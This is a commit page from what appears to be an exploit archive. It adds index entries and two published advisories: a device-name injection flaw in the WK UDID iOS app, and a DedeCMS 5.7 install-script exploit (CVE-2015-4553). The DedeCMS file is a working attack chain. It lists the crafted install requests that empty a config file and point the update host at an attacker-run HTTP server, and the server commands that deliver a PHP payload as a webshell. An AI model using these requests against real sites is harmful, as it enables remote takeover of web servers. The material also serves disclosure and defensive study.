Skip to content

Commit 8ad2e6b

Browse files
author
Offensive Security
committed
DB: 2015-07-06
3 new exploits
1 parent cd8d6ca commit 8ad2e6b

4 files changed

Lines changed: 413 additions & 0 deletions

File tree

files.csv

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -33774,6 +33774,7 @@ id,file,description,date,author,platform,type,port
3377433774
37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
3377533775
37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
3377633776
37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
33777+
37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0
3377733778
37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
3377833779
37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
3377933780
37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
@@ -33820,6 +33821,7 @@ id,file,description,date,author,platform,type,port
3382033821
37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-07-02,Dark-Puzzle,windows,dos,0
3382133822
37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
3382233823
37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
33824+
37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload Vulnerability",2015-07-03,T0x!c,php,webapps,80
3382333825
37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-03,TheCyberNuxbie,php,webapps,0
3382433826
37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0
3382533827
37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow Vulnerability",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
@@ -33834,3 +33836,4 @@ id,file,description,date,author,platform,type,port
3383433836
37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
3383533837
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
3383633838
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
33839+
37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0

platforms/ios/webapps/37492.txt

Lines changed: 163 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,163 @@
1+
Document Title:
2+
===============
3+
WK UDID v1.0.1 iOS - Command Inject Vulnerability
4+
5+
6+
References (Source):
7+
====================
8+
http://www.vulnerability-lab.com/get_content.php?id=1539
9+
10+
11+
Release Date:
12+
=============
13+
2015-07-01
14+
15+
16+
Vulnerability Laboratory ID (VL-ID):
17+
====================================
18+
1539
19+
20+
21+
Common Vulnerability Scoring System:
22+
====================================
23+
5.6
24+
25+
26+
Product & Service Introduction:
27+
===============================
28+
This app offers the opportunity to read device-specific information from your iPhone, iPad or iPod touch. The desired information can be
29+
selected and sent via email to a recipient of your choice or it can be copied to the clipboard for later use. You can get information about
30+
the unique identifier (UDID), the model, the name and the operating system of your device.
31+
32+
(Copy of the Homepage https://itunes.apple.com/us/app/wk-udid/id392624227 )
33+
34+
35+
Abstract Advisory Information:
36+
==============================
37+
The Vulnerability Laboratory Research team discovered a local command inject web vulnerability in the official WK UDID v1.0.1 iOS mobile web-application.
38+
39+
40+
Vulnerability Disclosure Timeline:
41+
==================================
42+
2015-07-01: Public Disclosure (Vulnerability Laboratory)
43+
44+
45+
Discovery Status:
46+
=================
47+
Published
48+
49+
50+
Affected Product(s):
51+
====================
52+
WK EDV GmbH
53+
Product: WK UDID - iOS Mobile Web Application 1.0.1
54+
55+
56+
Exploitation Technique:
57+
=======================
58+
Local
59+
60+
61+
Severity Level:
62+
===============
63+
Medium
64+
65+
66+
Technical Details & Description:
67+
================================
68+
A local command inject web vulnerability has been discovered in the official WK UDID v1.0.1 iOS mobile web-application.
69+
The vulnerability allows to inject malicious script codes to the application-side of the vulnerable mobile app.
70+
71+
The vulnerability is located in the device name value of the send by mail function. Local attackers are able to manipulate the name value
72+
of the device to compromise the mail function of the wkudid mobile app. The html encoding is broken in the send by mail export function.
73+
Local attackers are able to manipulate the device name id to compromise the application internal validation in send emails. The attack vector
74+
of the vulnerability is server-side and the injection point is the device name information settings.
75+
76+
The security risk of the local commandpath inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6.
77+
Exploitation of the commandpath inject vulnerability requires a low privilege androidios device account with restricted access and no user interaction.
78+
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
79+
compromise the mobile iOS application and connected device components.
80+
81+
Vulnerable Module(s)
82+
[+] Device - Settings - Information
83+
84+
Vulnerable Parameter(s)
85+
[+] device name
86+
87+
Affected Module(s)
88+
[+] WKUDID - Mail
89+
90+
91+
Proof of Concept (PoC):
92+
=======================
93+
The local command inject web vulnerability can be exploited by local attackers with low privilege device user account and without user interaction.
94+
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
95+
96+
Manual steps to reproduce the vulnerability ...
97+
1. Start the iOS device
98+
2. Open the settings module
99+
3. Change the name to the local command injection payload
100+
4. Save the settings and start the application wkudid
101+
5. Send the details by mail
102+
6. Review the arrival inbox
103+
7. The execution point is the xml and header location with the device name value
104+
8. Successful reproduce of the local command inject security vulnerability!
105+
106+
107+
PoC Device ID - Email
108+
109+
<div>Identifier (UDID): FFFFFFFFC0463E7B3E5D46A88EDF4194C74B27D1
110+
<br>Model: iPad<br>Name: bkm337>"<./[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE!]">%20<gt;<BR>
111+
System Name: iPhone OS<BR>System Version: 8.3<BR>Total Memory (RAM): 987.98 MB<BR>
112+
Free Memory: 19.06 MB<BR>Total Storage: 27.19 GB<BR>Free Storage: 0.70 GB<BR>
113+
CPU Frequency: an error occured<BR>Network: WiFi<BR>Wi-Fi: 02:00:00:00:00:00<BR>
114+
IP Address: 192.168.2.104<BR>Carrier: not available<BR></iframe></div>
115+
116+
117+
Solution - Fix & Patch:
118+
=======================
119+
The vulnerability can be patched by a secure parse and encode of the vulnerable Device name value. Restrict the input and encode the output in the
120+
vulnerable generated html file. Disallow script code values in the html generated file type to prevent further command injection attacks.
121+
122+
123+
Security Risk:
124+
==============
125+
The security rsik of the local command inject web vulnerability in the device name value is estimated as medium. (CVSS 5.6)
126+
127+
128+
Credits & Authors:
129+
==================
130+
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
131+
132+
133+
Disclaimer & Information:
134+
=========================
135+
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
136+
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
137+
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
138+
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
139+
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
140+
policies, deface websites, hack into databases or trade with fraud/stolen material.
141+
142+
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
143+
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
144+
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
145+
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
146+
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
147+
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
148+
149+
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
150+
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
151+
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
152+
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
153+
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
154+
155+
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
156+
157+
--
158+
VULNERABILITY LABORATORY - RESEARCH TEAM
159+
SERVICE: www.vulnerability-lab.com
160+
CONTACT: research@vulnerability-lab.com
161+
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
162+
163+

platforms/php/webapps/37423.txt

Lines changed: 199 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,199 @@
1+
==========================
2+
# Exploit Title: Dedecms variable coverage leads to getshell
3+
# Date: 26-06-2015
4+
# Vendor Homepage: http://www.dedecms.com/]
5+
# Version: dedecms 5.7-sp1 and all old version
6+
# CVE : CVE-2015-4553
7+
===========================
8+
9+
10+
[CVE-2015-4553]Dedecms variable coverage leads to getshell
11+
#############################################################################
12+
#
13+
# DBAPPSECURITY LIMITED http://www.dbappsecurity.com.cn/
14+
#
15+
#############################################################################
16+
#
17+
# CVE ID: CVE-2015-4553
18+
# Subject: Dedecms variable coverage leads to getshell
19+
# Author: zise
20+
# Date: 06.17.2015
21+
#############################################################################
22+
Introduction:
23+
========
24+
dedecms Open source cms
25+
Extensive application
26+
27+
Influence version
28+
Newest dedecms 5.7-sp1 and all old version
29+
30+
31+
Remote getshell
32+
Details:
33+
=======
34+
After the default installation of dedecms
35+
Installation directory
36+
/install/index.php
37+
or
38+
/install/index.php.bak
39+
40+
/install/index.php //run iis apache exploit
41+
/install/index.php.bak //run apache exploit
42+
43+
44+
Code analysis
45+
46+
/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb
47+
48+
#############################################################################
49+
17 $install_demo_name = 'dedev57demo.txt';
50+
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
51+
52+
here $install_demo_name and $insLockfile definition
53+
// echo $install_demo_name; printf dedev57demo.txt
54+
55+
29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
56+
30 {
57+
31 foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
58+
32 }
59+
60+
61+
// echo $install_demo_name; printf aaaa
62+
63+
$install_demo_name by variable coverage
64+
65+
The same
66+
17 $install_demo_name = 'dedev57demo.txt';
67+
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
68+
69+
variable coverage
70+
#############################################################################
71+
72+
73+
74+
75+
GETSHELL Step 1 Clear file contents config_update.php
76+
#############################################################################
77+
config_update.php
78+
13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
79+
14 $linkHost = 'http://flink.dedecms.com/server_url.php';
80+
81+
In order to obtain the webshell need to control $updateHost
82+
So the use of variable coverags cleared config_update.php
83+
84+
85+
http://192.168.204.135/install/index.php.bak
86+
?step=11
87+
&insLockfile=a
88+
&s_lang=a
89+
&install_demo_name=../data/admin/config_update.php
90+
91+
index.php.bak
92+
373 else if($step==11)
93+
374 {
94+
375 require_once('../data/admin/config_update.php');
95+
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
96+
377
97+
378 $sql_content = file_get_contents($rmurl);
98+
379 $fp = fopen($install_demo_name,'w');
99+
380 if(fwrite($fp,$sql_content))
100+
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
101+
382 else
102+
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
103+
384 unset($sql_content);
104+
385 fclose($fp);
105+
386 exit();
106+
387 }
107+
108+
###
109+
HTTP/1.1 200 OK
110+
Date: Wed, 17 Jun 2015 06:55:23 GMT
111+
Server: Apache/2.4.12
112+
X-Powered-By: PHP/5.6.6
113+
Vary: User-Agent
114+
Content-Length: 55
115+
Keep-Alive: timeout=5, max=100
116+
Connection: Keep-Alive
117+
Content-Type: text/html; charset=utf-8
118+
119+
<font color="red">[×]</font> 远程获取失败
120+
###
121+
122+
123+
124+
125+
###After execution file 0 byte ~ho~year~####
126+
2015/06/17 14:55 0 config_update.php
127+
1 file 0 byte
128+
129+
130+
131+
GETSHELL Step 2
132+
#############################################################################
133+
Create local HTTP services
134+
135+
zise:tmp zise$ ifconfig en0
136+
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
137+
inet 119.253.3.18 netmask 0xffffff00 broadcast
138+
139+
zise:tmp zise$ mkdir "dedecms"
140+
zise:tmp zise$ cd dedecms/
141+
zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
142+
zise:dedecms zise$ cd ../
143+
zise:tmp zise$ python -m SimpleHTTPServer
144+
Serving HTTP on 0.0.0.0 port 8000 ...
145+
192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
146+
147+
148+
####
149+
http://192.168.204.135/install/index.php.bak
150+
?step=11
151+
&insLockfile=a
152+
&s_lang=a
153+
&install_demo_name=hello.php
154+
&updateHost=http://119.253.3.18:8000/
155+
156+
####
157+
158+
HTTP/1.1 200 OK
159+
Date: Wed, 17 Jun 2015 07:11:18 GMT
160+
Server: Apache/2.4.12
161+
X-Powered-By: PHP/5.6.6
162+
Vary: Accept-Encoding,User-Agent
163+
Content-Length: 81
164+
Keep-Alive: timeout=5, max=100
165+
Connection: Keep-Alive
166+
Content-Type: text/html; charset=utf-8
167+
168+
<font color="green">[√]</font> 存在(您可以选择安装进行体验)
169+
170+
171+
index.php.bak
172+
373 else if($step==11)
173+
374 {
174+
375 require_once('../data/admin/config_update.php');
175+
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
176+
377
177+
378 $sql_content = file_get_contents($rmurl);
178+
379 $fp = fopen($install_demo_name,'w');
179+
380 if(fwrite($fp,$sql_content)) //fwrite websehll
180+
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
181+
382 else
182+
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
183+
384 unset($sql_content);
184+
385 fclose($fp);
185+
386 exit();
186+
387 }
187+
188+
Attack complete
189+
you webshell
190+
191+
http://192.168.204.135/install/hello.php
192+
193+
194+
195+
> zise ^_^
196+
> Security researcher
197+
198+
This is the vulnerability of some web pages
199+
http://seclists.org/fulldisclosure/2015/Jun/47

0 commit comments

Comments
 (0)